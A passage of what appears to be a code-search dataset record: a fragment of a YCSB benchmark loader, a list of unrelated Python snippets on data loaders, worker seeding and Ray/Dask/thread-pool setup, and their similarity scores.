FLAGS.ycsb_record_count:\n kwargs.setdefault('recordcount', FLAGS.ycsb_record_count)\n if FLAGS.ycsb_field_count:\n kwargs.setdefault('fieldcount', FLAGS.ycsb_field_count)\n if FLAGS.ycsb_field_length:\n kwargs.setdefault('fieldlength', FLAGS.ycsb_field_length)\n\n with open(workload_file) as fp:\n workload_meta = ParseWorkload(fp.read())\n workload_meta.update(kwargs)\n workload_meta.update(\n stage='load',\n clients=len(vms) * kwargs['threads'],\n threads_per_client_vm=kwargs['threads'],\n workload_name=os.path.basename(workload_file),\n )\n self.workload_meta = workload_meta\n record_count = int(workload_meta.get('recordcount', '1000'))\n n_per_client = int(record_count) // len(vms)\n loader_counts = [\n n_per_client + (1 if i < (record_count % len(vms)) else 0)\n for i in range(len(vms))\n ]\n\n remote_path = posixpath.join(\n linux_packages.INSTALL_DIR, os.path.basename(workload_file)\n )\n\n args = [((vm, workload_file, remote_path), {}) for vm in dict.fromkeys(vms)]\n background_tasks.RunThreaded(PushWorkload, args)\n\n kwargs['parameter_files'] = [remote_path]\n\n def _Load(loader_index):\n start = sum(loader_counts[:loader_index])\n kw = copy.deepcopy(kwargs)\n kw.update(insertstart=start, insertcount=loader_counts[loader_index])\n if self.perclientparam is not None:\n kw.update(self.perclientparam[loader_index])\n results.append(self._Load(vms[loader_index], **kw))\n logging.info('VM %d (%s) finished', loader_index, vms[loader_index])\n\n start = time.time()\n background_tasks.RunThreaded(_Load, list(range(len(vms))))\n events.record_event.send(\n type(self).__name__,\n event='load',\n start_timestamp=start,\n end_timestamp=time.time(),\n metadata=copy.deepcopy(kwargs),\n )\n\n if len(results) != len(vms):\n raise IOError(\n 'Missing results: only {0}/{1} reported\\n{2}'.format(\n len(results), len(vms), results\n )\n )\n\n samples = []\n if FLAGS.ycsb_include_individual_results and len(results) > 1:\n for i, result in enumerate(results):\n samples.extend(\n ycsb_stats.CreateSamples(\n ycsb_result=result,\n ycsb_version=FLAGS.ycsb_version,\n include_command_line=_SHOULD_RECORD_COMMAND_LINE.value,\n result_type='individual',\n result_index=i,\n 
**workload_meta,\n )\n )\n\n # hdr histograms not collected upon load, only upon run\n combined = ycsb_stats.CombineResults(results, self.measurement_type, {})\n samples.extend(\n ycsb_stats.CreateSamples(\n ycsb_result=combined,\n ycsb_version=FLAGS.ycsb_version,\n include_histogram=FLAGS.ycsb_histogram,\n include_command_line=_SHOULD_RECORD_COMMAND_LINE.value,\n result_type='combined',\n **workload_meta,\n )\n )\n\n return samples", "def worker_init_fn(worker_id):\n worker_info = torch.utils.data.get_worker_info() # type: ignore\n if hasattr(worker_info.dataset, \"transform\") and hasattr(worker_info.dataset.transform, \"set_random_state\"):\n worker_info.dataset.transform.set_random_state(worker_info.seed % (2 ** 32))", "def __init__(self, dataset, num_workers=200):\n self.dataset = dataset\n self.cache = []\n print('Caching started ...')\n batch_size = min(len(dataset) // max(num_workers, 1), 8192)\n cacheloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,\n shuffle=False, drop_last=False, num_workers=num_workers,\n pin_memory=False)\n\n # Allocate memory:\n self.cache = torch.empty((len(self.dataset), *self.dataset[0][0].shape), pin_memory=PIN_MEMORY)\n\n pointer = 0\n for data in cacheloader:\n batch_length = data[0].shape[0]\n self.cache[pointer: pointer + batch_length] = data[0] # assuming the first return value of data is the image sample!\n pointer += batch_length\n print(f\"[{pointer} / {len(dataset)}] samples processed.\")\n\n print(f'Dataset sucessfully cached into RAM.')", "def __init__(__self__, *,\n threads_per_core: int):\n pulumi.set(__self__, \"threads_per_core\", threads_per_core)", "def create_worker(num_worker, server_ip, server_port):\n for i in range(int(num_worker)):\n print \"-- worker initializing --\"\n dask_server = Worker('tcp://'+server_ip+\":\"+str(server_port), loop=loop)\n dask_server.start()", "def get_data_loader(batch_size=10, num_workers=2):\n \n data_loader = torch.utils.data.DataLoader(dataset=TempuckeyDataSet(),\n batch_size=batch_size,\n shuffle=True,\n pin_memory=True,\n num_workers=num_workers,\n collate_fn=collate)\n return data_loader", "def _call_initialization(self,\r\n input_fp,\r\n output_dir,\r\n params,\r\n job_prefix,\r\n poll_directly,\r\n suppress_submit_jobs):\r\n self.prefix_counts = {}", "def init_processes(cfg, local_rank, dataset, fn, backend='nccl'):\n addr = \"localhost\"\n port = cfg.training.master_port\n os.environ['MASTER_ADDR'] = addr\n os.environ['MASTER_PORT'] = str(port)\n dist.init_process_group(backend, rank=0 + local_rank,\n world_size=cfg.training.gpus)\n\n device = torch.device(\"cuda:{}\".format(local_rank))\n\n fn(cfg, local_rank, device, corpus_path=dataset)", "def preprocessing(pairs, nb=4):\n generated = Parallel(n_jobs=nb, verbose=5)(delayed(_load_brick)(*p) for p in pairs)\n return generated", "def get_each_loader(data_path, batch_size, trn_negnum, shuffle=True, num_workers=0):\n \n dataset = ML_Dataset(data_path, trn_negnum)\n \n if data_path.endswith('trn') == True:\n collate = dataset.train_collate\n else:\n collate = test_collate\n\n data_loader = data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=collate)\n\n return data_loader", "def __init__(self, generator_func, dtypes, shapes, n_worker, device=None):\n self.dtypes = tuple([tf.as_dtype(each) for each in dtypes])\n self.shapes = tuple(shapes)\n # Construct dataset\n self.dataset = tf.data.Dataset.range(n_worker).repeat().apply(\n tf.contrib.data.parallel_interleave(\n 
lambda x: tf.data.Dataset.from_generator(generator_func, self.dtypes, self.shapes),\n cycle_length=n_worker, sloppy=True)) # parallel generators\n self.dataset = self.dataset.prefetch(n_worker)\n if device is not None:\n self.dataset = self.dataset.apply(tf.contrib.data.prefetch_to_device(device))\n self.iterator = self.dataset.make_one_shot_iterator()\n self.batch_data = self.iterator.get_next()", "def __init__(self, data_path):\r\n\t\tfile_names = ['data_batch_%d' % i for i in range(1,6)]\r\n\t\tfile_names.append('test_batch')\r\n\r\n\t\tX = []\r\n\t\ty = []\r\n\t\tfor file_name in file_names:\r\n\t\t\twith open(data_path + file_name) as fin:\r\n\t\t\t\tdata_dict = cPickle.load(fin)\r\n\t\t\tX.append(data_dict['data'].ravel())\r\n\t\t\ty = y + data_dict['labels']\r\n\r\n\t\tself.X = np.asarray(X).reshape(60000, 32*32*3)\r\n\t\tself.y = np.asarray(y)\r\n\r\n\t\tfin = open(data_path + 'batches.meta')\r\n\t\tself.LABEL_NAMES = cPickle.load(fin)['label_names']\r\n\t\tfin.close()", "def _initialize(self) -> None:\n p = self.params\n # We make self.input public so that users can access its methods like\n # IdsToStrings if needed.\n with py_utils.infeed_context_scope(\n infeed_host_index=p.infeed_host_index,\n num_infeed_hosts=p.num_infeed_hosts):\n self.input = p.input.Instantiate()\n\n if hasattr(self.input, 'datasource') and isinstance(\n self.input.datasource, datasource.TFDatasetSource):\n # For the special case when the input is implemented by a tf.data.Dataset,\n # use it directly. Otherwise roundtrip adaptions may result in returning\n # duplciate batches.\n self._get_next_fn = self.input.datasource.GetNext\n else:\n self._get_next_fn = tf.function(self._get_batch)\n self._num_batches_produced = 0", "def minibatch_loader_thread(self):\r\n \r\n blobs = self.get_next_minibatch()\r\n \r\n ordered_blobs = OrderedDict()\r\n \r\n for key in self.get_output_names(): \r\n ordered_blobs[key] = blobs[key]", "def init_workers():\n party_queue = Queue()\n p = Producer(party_queue)\n p.daemon = True\n c = Consumer(party_queue)\n c.deamon= True\n m = MasterUpdater(db,application_name)\n m.deamon = True\n p.start()\n c.start()\n m.start()", "def initialize_multiprocessing(self):\n if self.multiprocessing_controller is not None:\n MPControl.set_multiprocess_engine(self.multiprocessing_controller)\n MPControl.connect()", "def init_distributed(backend, world_size, rank, checkpoint_dir):\n # multi-gpu initial\n logger.debug(f'Initializing {world_size} workers')\n # Remove the init file from previous version\n init_dir = checkpoint_dir / 'shared_distributed'\n if init_dir.is_file():\n rm_file(init_dir)\n\n init_dir.mkdir(parents=True, exist_ok=True)\n init_file = init_dir / f'slurm-{slurm.job_id}'\n init_method = init_file.resolve().as_uri()\n dist.init_process_group(backend, world_size=world_size, rank=rank, init_method=init_method)\n logger.debug('Init finished')", "def _initialize_backend(self):\n try:\n n_jobs = self._backend.configure(n_jobs=self.n_jobs, parallel=self,\n **self._backend_args)\n if self.timeout is not None and not self._backend.supports_timeout:\n warnings.warn(\n 'The backend class {!r} does not support timeout. 
'\n \"You have set 'timeout={}' in Parallel but \"\n \"the 'timeout' parameter will not be used.\".format(\n self._backend.__class__.__name__,\n self.timeout))\n\n except FallbackToBackend as e:\n # Recursively initialize the backend in case of requested fallback.\n self._backend = e.backend\n n_jobs = self._initialize_backend()\n\n return n_jobs", "def Initialize(self):\n self.queue_workers = [\n gevent.spawn(self._EventQueueWorker) for _ in xrange(self.num_workers)]\n self.gc_worker = gevent.spawn(self._GarbageCollectorWorker)", "def __initializeDistributed(self):\n self.raiseADebug(\"Initializing parallel InternalParallel: {0} Nodes: {1}\".format(self.runInfoDict['internalParallel'],len(self.runInfoDict['Nodes'])))\n if self._parallelLib != ParallelLibEnum.shared:\n # dashboard?\n db = self.runInfoDict['includeDashboard']\n # Check if the list of unique nodes is present and, in case, initialize the\n servers = None\n sys.path.append(self.runInfoDict['WorkingDir'])\n if 'UPDATE_PYTHONPATH' in self.runInfoDict:\n sys.path.extend([p.strip() for p in self.runInfoDict['UPDATE_PYTHONPATH'].split(\":\")])\n\n if _rayAvail:\n # update the python path and working dir\n olderPath = os.environ[\"PYTHONPATH\"].split(os.pathsep) if \"PYTHONPATH\" in os.environ else []\n os.environ[\"PYTHONPATH\"] = os.pathsep.join(set(olderPath+sys.path))\n\n # is ray instanciated outside?\n self.rayInstanciatedOutside = 'headNode' in self.runInfoDict\n self.daskInstanciatedOutside = 'schedulerFile' in self.runInfoDict\n if len(self.runInfoDict['Nodes']) > 0 or self.rayInstanciatedOutside or self.daskInstanciatedOutside:\n availableNodes = [nodeId.strip() for nodeId in self.runInfoDict['Nodes']]\n uniqueN = list(set(availableNodes))\n # identify the local host name and get the number of local processors\n localHostName = self.__getLocalHost()\n self.raiseADebug(\"Head host name is : \", localHostName)\n # number of processors\n nProcsHead = availableNodes.count(localHostName)\n if not nProcsHead:\n self.raiseAWarning(\"# of local procs are 0. 
Only remote procs are avalable\")\n self.raiseAWarning(f'Head host name \"{localHostName}\" /= Avail Nodes \"'+', '.join(uniqueN)+'\"!')\n self.raiseADebug(\"# of local procs : \", str(nProcsHead))\n self.raiseADebug(\"# of total procs : \", str(len(availableNodes)))\n if nProcsHead != len(availableNodes) or self.rayInstanciatedOutside or self.daskInstanciatedOutside:\n if self.rayInstanciatedOutside:\n address = self.runInfoDict['headNode']\n elif self.daskInstanciatedOutside:\n self.daskSchedulerFile = self.runInfoDict['schedulerFile']\n else:\n # create head node cluster\n # port 0 lets ray choose an available port\n address = self.__runHeadNode(nProcsHead, 0)\n if self._parallelLib == ParallelLibEnum.ray:\n # add names in runInfo\n self.runInfoDict['headNode'] = address\n self.raiseADebug(\"Head host IP :\", address)\n if self._parallelLib == ParallelLibEnum.dask:\n # add file in runInfo\n self.runInfoDict['schedulerFile'] = self.daskSchedulerFile\n self.raiseADebug('scheduler file :', self.daskSchedulerFile)\n ## Get servers and run ray or dask remote listener\n if self.rayInstanciatedOutside or self.daskInstanciatedOutside:\n servers = self.runInfoDict['remoteNodes']\n else:\n servers = self.__runRemoteListeningSockets(address, localHostName)\n # add names in runInfo\n self.runInfoDict['remoteNodes'] = servers\n if self._parallelLib == ParallelLibEnum.ray:\n ## initialize ray server with nProcs\n self._server = ray.init(address=address,log_to_driver=False,include_dashboard=db)\n elif self._parallelLib == ParallelLibEnum.dask:\n if self.daskSchedulerFile is not None:\n #handle multinode and prestarted configurations\n self._server = dask.distributed.Client(scheduler_file=self.daskSchedulerFile)\n else:\n #Start locally\n cluster = dask.distributed.LocalCluster()\n self._server = dask.distributed.Client(cluster)\n else:\n self.raiseAWarning(\"No supported server\")\n if self._parallelLib == ParallelLibEnum.ray:\n self.raiseADebug(\"NODES IN THE CLUSTER : \", str(ray.nodes()))\n else:\n if self._parallelLib == ParallelLibEnum.ray:\n self.raiseADebug(\"Executing RAY in the cluster but with a single node configuration\")\n self._server = ray.init(num_cpus=nProcsHead,log_to_driver=False,include_dashboard=db)\n elif self._parallelLib == ParallelLibEnum.dask:\n self.raiseADebug(\"Executing DASK in the cluster but with a single node configuration\")\n #Start locally\n cluster = dask.distributed.LocalCluster()\n self._server = dask.distributed.Client(cluster)\n else:\n self.raiseADebug(\"Initializing\", str(self._parallelLib), \"locally with num_cpus: \", self.runInfoDict['totalNumCoresUsed'])\n if self._parallelLib == ParallelLibEnum.ray:\n self._server = ray.init(num_cpus=int(self.runInfoDict['totalNumCoresUsed']),include_dashboard=db)\n elif self._parallelLib == ParallelLibEnum.dask:\n #handle local method\n cluster = dask.distributed.LocalCluster(n_workers=int(self.runInfoDict['totalNumCoresUsed']))\n self._server = dask.distributed.Client(cluster)\n else:\n self.raiseAWarning(\"parallellib creation not handled\")\n if self._parallelLib == ParallelLibEnum.ray:\n self.raiseADebug(\"Head node IP address: \", self._server.address_info['node_ip_address'])\n self.raiseADebug(\"Redis address : \", self._server.address_info['redis_address'])\n self.raiseADebug(\"Object store address: \", self._server.address_info['object_store_address'])\n self.raiseADebug(\"Raylet socket name : \", self._server.address_info['raylet_socket_name'])\n self.raiseADebug(\"Session directory : \", 
self._server.address_info['session_dir'])\n self.raiseADebug(\"GCS Address : \", self._server.address_info['gcs_address'])\n if servers:\n self.raiseADebug(\"# of remote servers : \", str(len(servers)))\n self.raiseADebug(\"Remote servers : \", \" , \".join(servers))\n else:\n self.raiseADebug(\"JobHandler initialized without ray\")\n else:\n ## We are just using threading\n self._server = None\n self.raiseADebug(\"JobHandler initialized with threading\")\n # ray or dask is initialized\n self.__isDistributedInitialized = True", "def worker_init_fn(worker_id):\n np.random.seed(np.random.get_state()[1][0] + worker_id)", "def worker_init_fn(worker_id):\n np.random.seed(np.random.get_state()[1][0] + worker_id)", "def __init__(__self__, *,\n batch_node_count: Optional[pulumi.Input[int]] = None,\n batch_percentage: Optional[pulumi.Input[float]] = None,\n batch_soak_duration: Optional[pulumi.Input[str]] = None):\n if batch_node_count is not None:\n pulumi.set(__self__, \"batch_node_count\", batch_node_count)\n if batch_percentage is not None:\n pulumi.set(__self__, \"batch_percentage\", batch_percentage)\n if batch_soak_duration is not None:\n pulumi.set(__self__, \"batch_soak_duration\", batch_soak_duration)", "def __init__(self, pool_size):\n \n self.pool_size=pool_size;", "def __init__(self):\n super().__init__()\n self.printTag = 'Job Handler' # Print tag of this object\n self.runInfoDict = {} # Container of the running info (RunInfo block in the input file)\n self.__isDistributedInitialized = False # Is Ray or Dask Initialized?\n self._server = None # Variable containing the info about the RAY or DASK parallel server.\n # If None, multi-threading is used\n self.sleepTime = 1e-4 # Sleep time for collecting/inquiring/submitting new jobs\n self.completed = False # Is the execution completed? When True, the JobHandler is shut down\n self.__profileJobs = False # Determines whether to collect and print job timing summaries at the end of job runs.\n self.maxQueueSize = None # Prevents the pending queue from growing indefinitely, but also\n # allowing extra jobs to be queued to prevent starving\n # parallelized environments of jobs.\n\n ############################################################################\n # The following variables are protected by the __queueLock\n\n # Placeholders for each actively running job. When a job finishes, its\n # spot in one of these lists will be reset to None and the next Runner will\n # be placed in a free None spot, and set to start\n self.__running = []\n self.__clientRunning = []\n\n # Queue of jobs to be run, when something on the list above opens up, the\n # corresponding queue will pop a job (Runner) and put it into that location\n # and set it to start\n self.__queue = collections.deque()\n self.__clientQueue = collections.deque()\n\n # A counter used for uniquely identifying the next id for an ExternalRunner\n # InternalRunners will increment this counter, but do not use it currently\n self.__nextId = 0\n\n # List of finished jobs. 
When a job finishes, it is placed here until\n # something from the main thread can remove them.\n self.__finished = []\n\n # End block of __queueLock protected variables\n ############################################################################\n\n self.__queueLock = threading.RLock()\n # List of submitted job identifiers, includes jobs that have completed as\n # this list is not cleared until a new step is entered\n self.__submittedJobs = []\n # Dict of failed jobs of the form { identifier: metadata }\n self.__failedJobs = {}\n # Dict containing info about batching\n self.__batching = collections.defaultdict()\n self.rayInstanciatedOutside = None\n self.daskInstanciatedOutside = None\n self.remoteServers = None\n self.daskSchedulerFile = None\n self._daskScheduler = None", "def __init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)", "def _create_jobs(self):\n try:\n self.request_master_socket.send_multipart([remote_constants.WORKER_CONNECT_TAG])\n _ = self.request_master_socket.recv_multipart()\n except zmq.error.Again as e:\n logger.error(\"Can not connect to the master, \" \"please check if master is started.\")\n self.master_is_alive = False\n return\n\n initialized_jobs = self._init_jobs(job_num=self.device_count)\n self.request_master_socket.setsockopt(zmq.RCVTIMEO, remote_constants.HEARTBEAT_TIMEOUT_S * 1000)\n\n def master_heartbeat_exit_callback_func():\n logger.warning(\"[Worker] lost connection with the master, will exit reply heartbeat for master.\")\n if self.worker_status is not None:\n self.worker_status.clear()\n self.log_server_proc.kill()\n self.log_server_proc.wait()\n # exit the worker\n self.exit()\n\n self.master_heartbeat_thread = HeartbeatServerThread(\n heartbeat_exit_callback_func=master_heartbeat_exit_callback_func)\n self.master_heartbeat_thread.setDaemon(True)\n self.master_heartbeat_thread.start()\n self.master_heartbeat_address = self.master_heartbeat_thread.get_address()\n\n logger.set_dir(\n os.path.expanduser('~/.parl_data/worker/{}'.format(self.master_heartbeat_address.replace(':', '_'))))\n if self.cpu_num:\n logger.info(\"[Worker] Connect to the master node successfully. \" \"({} CPUs)\".format(self.cpu_num))\n elif self.gpu_num:\n logger.info(\"[Worker] Connect to the master node successfully. 
\" \"({} GPUs)\".format(self.gpu_num))\n\n for job in initialized_jobs:\n job.worker_address = self.master_heartbeat_address\n\n allocated_cpu = AllocatedCpu(self.master_heartbeat_address, self.cpu_num)\n allocated_gpu = AllocatedGpu(self.master_heartbeat_address, self.gpu)\n initialized_worker = InitializedWorker(self.master_heartbeat_address, initialized_jobs, allocated_cpu,\n allocated_gpu, socket.gethostname())\n self.request_master_socket.send_multipart(\n [remote_constants.WORKER_INITIALIZED_TAG,\n cloudpickle.dumps(initialized_worker)])\n\n message = self.request_master_socket.recv_multipart()\n if message[0] == remote_constants.REJECT_CPU_WORKER_TAG:\n logger.error(\"GPU cluster rejects a CPU worker to join in\")\n self.worker_is_alive = False\n elif message[0] == remote_constants.REJECT_GPU_WORKER_TAG:\n logger.error(\"CPU cluster rejects a GPU worker to join in\")\n self.worker_is_alive = False\n else:\n self.worker_status = WorkerStatus(self.master_heartbeat_address, initialized_jobs, self.cpu_num,\n self.gpu_num)", "def __init__(self, ops: Callable, batch_size: int = 4,\n num_workers: int = 8, path_to_data: str = './project/dataset/few_shot/'):\n super(FewShotDataModule, self).__init__()\n\n self.ops = ops\n self.path_to_data = path_to_data\n self.batch_size = batch_size\n self.num_workers = num_workers\n\n self.splits = {} # Contains train and valid splits.\n self.datasets = {} # Contains instances of the Dataset class. One per data spit.\n self.class_map = dict(zip(CLASS_NAMES, range(len(CLASS_NAMES))))\n self.weights = [0] * len(CLASS_NAMES)", "def __init__(self , driver = None, max_submit = 1 , size = 0):\n \n OK_file = None \n exit_file = None\n \n c_ptr = cfunc.alloc( max_submit , OK_file , exit_file)\n self.init_cobj( c_ptr , cfunc.free )\n \n self.jobs = JobList()\n self.size = size\n \n self.exists = exList( self.jobs )\n self.status = statusList( self.jobs )\n self.run_time = runtimeList( self.jobs , self )\n \n self.start( blocking = False )\n if driver:\n self.driver = driver\n cfunc.set_driver( self , driver.c_ptr )", "def __init__(\n self, batch_size: int = 64, num_workers: int = 0, **kwargs: Any\n ) -> None:\n super().__init__(EuroSAT, batch_size, num_workers, **kwargs)", "def __init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)\n \n self._results_ = None", "def __init__(self):\n self.label = \"Partition NNInput Files\"\n self.description = \"Partitions Neural Network class.dta of more than 200,000 records into files of 200,000 or less.\"\n self.canRunInBackground = False\n self.category = \"Neural network\"", "def init_loaders(self, *args, **kwargs):\n\n # Convert the data to Dataset\n dataset_dict = self.init_datasets(*args, **kwargs)\n\n # If the Dataset implements collate_fn, that is used. 
Otherwise, default_collate is used\n if hasattr(dataset_dict[\"train\"], \"collate_fn\") and callable(\n getattr(dataset_dict[\"train\"], \"collate_fn\")\n ):\n collate_fn = dataset_dict[\"train\"].collate_fn\n else:\n collate_fn = default_collate\n\n # If 'iters_per_epoch' is defined, then a fixed number of random sample batches from the training set\n # are drawn per epoch.\n # Otherwise, an epoch is defined by a full run through all of the data in the dataloader.\n #\n if self.config_dict.get(\"iters_per_epoch\") is not None:\n num_samples = (\n self.config_dict[\"iters_per_epoch\"] * self.config_dict[\"batch_size\"]\n )\n loaders_dict = {}\n for key in dataset_dict.keys():\n if key == \"train\":\n loaders_dict[key] = DataLoader(\n dataset_dict[key],\n batch_sampler=BatchSampler(\n RandomSampler(\n dataset_dict[key],\n replacement=True,\n num_samples=num_samples,\n ),\n batch_size=self.config_dict[\"batch_size\"],\n drop_last=False,\n ),\n collate_fn=collate_fn,\n )\n else:\n loaders_dict[key] = DataLoader(\n dataset_dict[key],\n batch_size=self.config_dict[\"batch_size\"],\n collate_fn=collate_fn,\n )\n else:\n loaders_dict = {\n key: DataLoader(\n dataset_dict[key],\n batch_size=self.config_dict[\"batch_size\"],\n collate_fn=collate_fn,\n )\n for key in data_dict.keys()\n }\n\n return loaders_dict", "def __init__(self, threads_count):\n\n self.queue = Queue(threads_count)\n\n self.threads = []\n self.device = None\n\n self.create_workers(threads_count)\n self.start_workers()", "def __init__(self, pool, params = None):\n\n # initialize thread\n Thread.__init__(self)\n\n # store link to threads pool\n self.pool = pool\n\n # set control parameteres\n self.threadsWorking = 0\n try:\n self.delay = params['delay']\n except KeyError:\n self.delay = 30\n try:\n self.maxJobs = params['jobsToPoll']\n except KeyError:\n self.maxJobs = 100\n\n self.sessionPool = params['sessionPool']\n self.groupsUnderProcessing = Set([])\n self.jobPerTask = None\n\n # start scheduler thread\n self.setDaemon(1)\n self.start()", "def __init__(self, config, maxCores, maxMemory, maxDisk):\n self.config = config\n self.maxCores = maxCores\n self.maxMemory = maxMemory\n self.maxDisk = maxDisk\n self.environment = {}\n \"\"\"\n :type dict[str,str]\n \"\"\"\n self.workerCleanupInfo = WorkerCleanupInfo(workDir=self.config.workDir,\n workflowID=self.config.workflowID,\n cleanWorkDir=self.config.cleanWorkDir)", "def __init__(self, parallel_num=4):\n from concurrent.futures import ThreadPoolExecutor\n self.executor = ThreadPoolExecutor(max_workers=parallel_num)", "def __init__(self, \n fname_templates,\n fname_spike_train,\n reader,\n fname_out,\n dtype_out):\n #self.logger = logging.getLogger(__name__)\n\n # keep templates and spike train filname\n # will be loaded during each prallel process\n self.fname_templates = fname_templates\n self.fname_spike_train = fname_spike_train\n\n self.reader = reader\n\n # save output name and dtype\n self.fname_out = fname_out\n self.dtype_out = dtype_out" ]
[ "0.7315344", "0.71394104", "0.69043654", "0.67671055", "0.67395073", "0.66971", "0.6604564", "0.6591444", "0.656487", "0.65599173", "0.6558237", "0.65196973", "0.6494201", "0.648432", "0.63900125", "0.6368222", "0.63650346", "0.63589203", "0.63572824", "0.6347132", "0.63001454", "0.6292539", "0.6282449", "0.6282194", "0.6260865", "0.62605554", "0.62597615", "0.6244845", "0.6227652", "0.6222328", "0.6207713", "0.6194747", "0.6176453", "0.61442196", "0.61330783", "0.6113565", "0.61031914", "0.6077364", "0.6061316", "0.6053784", "0.60468054", "0.60414636", "0.60386556", "0.6030019", "0.6012165", "0.59896725", "0.5988417", "0.59857565", "0.5985405", "0.59704125", "0.59704125", "0.59685344", "0.5965752", "0.5960198", "0.59569263", "0.59466326", "0.5944444", "0.59401923", "0.59260535", "0.59260535", "0.59215087", "0.5915642", "0.5914943", "0.5911792", "0.5911356", "0.59098756", "0.5901214", "0.5897627", "0.5891741", "0.5881683", "0.5880973", "0.58781224", "0.5868659", "0.5858555", "0.58430195", "0.58370113", "0.58335185", "0.5830051", "0.58237606", "0.5822499", "0.58181053", "0.58055246", "0.57891834", "0.5768597", "0.5768597", "0.57655275", "0.5763134", "0.5760156", "0.57566714", "0.5755784", "0.5745833", "0.5743095", "0.5742559", "0.57407117", "0.573072", "0.57284635", "0.5728118", "0.5725148", "0.57177794", "0.571675", "0.57138556" ]
0.0
-1
Chooses starting station based on the least amount of connections and adds it to a new track.
def create_new_track(self, station_list, i, new_grid):
    self.first_station = self.stations[station_list.pop(0)]
    track = Track(f"depthfirst_{i}", new_grid)
    track.add_station(new_grid, self.first_station.name)
    return track
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pick_next_station(self, station):\n self.best_score = 0\n\n stations = self.grid.stations\n # all connections of the last added added station \n lookahead_1 = self.grid.get_station(self.best_connection[1]).connections\n\n for la1 in lookahead_1.values():\n next_station = la1[0].name\n # if adding the connection exceeds the tracks max time length \n if self.track.add_station(self.grid, next_station) is False:\n break\n\n lookahead_2 = self.grid.get_station(la1[0].name).connections\n\n # keeps adding stations untill the time limit is reached\n for la2 in lookahead_2:\n la2 = stations.get(la2)\n if self.track.add_station(self.grid, la2.name) is False:\n break\n \n quality = self.grid.get_quality()\n \n self.track.remove_last_station()\n\n # if quality improves, add first station to the track\n if quality > self.best_score:\n self.best_score = quality \n self.best_connection = [la2.name, la1[0].name]\n \n self.track.remove_last_station()", "def pick_first_connection(self):\n self.best_connection = []\n stations = list(self.grid.stations.values())\n\n # add a first station to the track \n for station in stations:\n self.track = Track(f\"greedy_track_{self.count}\", self.grid)\n self.track.add_station(self.grid, station.name)\n\n lookahead_1 = station.connections\n\n # calculate quality of all connections and save the best connection\n for la1 in lookahead_1: \n next_station = stations[int(la1)].name\n self.track.add_station(self.grid, next_station)\n lookahead_2 = stations[int(la1)].get_connections()\n \n for la2 in lookahead_2:\n # if adding the connection exceeds the track's max time length \n if self.track.add_station(self.grid, la2[0].name) is False:\n break\n \n quality = self.grid.get_quality()\n self.track.remove_last_station()\n\n # checks if the quality of the track is the best one yet and remembers it\n if quality > self.best_score:\n self.best_score = quality \n self.best_connection = [station.name, stations[int(la1)].name, la2[0].name]\n self.track.remove_last_station()\n \n # if adding another track does not lead to a better quality, stop algorithm\n if self.best_connection == []:\n return False\n \n # add best connection to the track\n self.track = Track(f\"greedy_track_{self.count}\", self.grid)\n self.track.add_station(self.grid, self.best_connection[0])\n\n self.count += 1\n\n return station", "def add_connection_beginning(self, route, potential_solution):\n\n current_station = route.stations[0]\n\n # pick a random new station out of all connections of the current station\n new_station = random.choice(list(current_station.connections.keys()))\n\n # find the connection between the two stations \n link = current_station.connections[new_station] \n\n # find the time of the connection \n time = link.time \n \n\n # only accept the change if it wouldn't exceed the maximum time\n if time + route.total_time <= self.max_minutes:\n \n # insert the connection to the front of the connection list\n route.insert_connection(link, time, 0)\n\n # insert the station to the front of the station list\n route.insert_station(new_station, 0)", "def visit_all_possibilities(self, first_station, track, grid):\n # loops over connections of station\n for connection in first_station.connections:\n # keeps adding untill the max length of a track is reached\n if track.add_station(grid, self.stations[connection].name):\n # calculates the quality of adding the station and remembers it if it is the best score yet\n if grid.get_quality() > self.best_score:\n self.best_score = grid.get_quality()\n 
self.grid = copy.deepcopy(grid)\n print(f\"new best score: {self.best_score}:\\n{self.grid}\\n\\n\")\n\n # repeat untill there are no more configurations left\n self.visit_all_possibilities(self.stations[connection], track, grid)\n track.remove_last_station()", "def shortest_path(self):\n\t\t#dict that will hold the cost of traveling to each station\n\t\t#add the initial cost of the starting station, which is 0\n\t\tD = {0:0}\n\n\t\t#add all of our dict keys (stations) to our queue\n\t\tstation_queue = self.station_graph.keys()\n\n\t\t#sort the keys! since the graph is directed and acyclic, the stations\n\t\t#can be explored one at a time, in order, without having to adjust\n\t\t#for the lowest distance value via priority queue.\n\t\t#\n\t\t#sort them with reverse=True so that they can be popped from the\n\t\t#end of the list instead of from the beginning. This should save\n\t\t#some cpu time.\n\t\tstation_queue.sort(reverse=True)\n\t\twhile len(station_queue) > 0:\n\n\t\t\tstation = station_queue.pop() #grab the next node in the queue\n\n\t\t\tfor next_st, next_cost in self.station_graph[station].iteritems():\n\t\t\t\t#loops through the current station's neighbors, and calculates\n\t\t\t\t#their costs from the starting node, making sure to store\n\t\t\t\t#the lowest cost in our D dict\n\t\t\t\talt = D[station] + next_cost #sum the costs\n\t\t\t\tif not D.has_key(next_st) or alt < D[next_st]:\n\t\t\t\t\t#if there is no cost on record, or if the newly calculated\n\t\t\t\t\t#cost is lower than the currently recorded one, then\n\t\t\t\t\t#record the newly calculated cost as the lowest\n\t\t\t\t\tD[next_st] = alt #set the cost to get to next_st\n\n\t\treturn D[self.final_stop]", "def _select_destination(self):\n # Ideally this should do something clever based on the start location\n # ie known trips. 
